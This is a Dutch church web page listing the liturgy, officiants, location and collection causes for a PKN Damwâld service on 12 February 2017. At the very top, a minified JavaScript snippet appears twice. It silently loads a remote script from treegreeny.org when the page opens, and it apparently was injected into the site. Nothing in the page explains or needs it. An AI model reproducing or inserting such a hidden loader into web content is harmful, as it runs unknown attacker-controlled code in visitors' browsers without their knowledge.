;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 februari 2017 9:30 uur - PKN Damwâld
zondag 12 februari 2017
09:30 uur

Kerkdienst zondag 12 februari 2017 9:30 uur

Informatie

Voorganger:Kand. H.J. van der Wal, Groningen
Organist:Foeke Wiegersma
Liturgie
Lied voor de dienst Evangelische Liedbundel 302
Welkom en mededelingen
Intochtslied Psalm 121, vers 1 en 2
Stilgebed en Votum
We zingen: Psalm 121, vers 3 en 4
Lezing van de Wet Leviticus 19:2-4.11-18
We zingen: Psalm 41, vers 1
Gebed om de opening van het Woord en de verlichting van de Heilige Geest
We lezen: Lucas 10, vers 25 t/m 37
We zingen: Psalm 25, vers 2 en 4
Preek
We zingen: Gezang 62, vers 1, 2, 3 en 4
Dankgebed en voorbeden
Collecte
Slotlied Gezang 473, vers 1, 2 en 10
Zegenbede
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Beautiful Kidz Namibia

Beautiful Kidz Namibia is een Christelijke, Interkerkelijke organisatie. In een eigen dagverzorgingscentrum in de sloppenwijk "Katutura"van de hoofdstad Windhoek wordt sinds 2003 steun geboden aan kinderen in nood. In 2014 is de organisatie uitgebreid met het dagopvangcentrum in Ovitoto. Het gaat om steun aan kwetsbare kinderen die veelal het slachtoffer zijn geworden van de HIV/AIDS epidemie. Vader en/of moeder zijn aan de gevolgen van AIDS overleden en in veel gevallen zijn de kinderen zelf ook seropositief. Het met nauwelijks twee miljoen inwoners dun bevolkte land Namibia telt 200.000 weeskinderen! Er is een groot tekort aan opvang voor deze kinderen. Beautiful Kidz gaat de uitdaging aan!

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds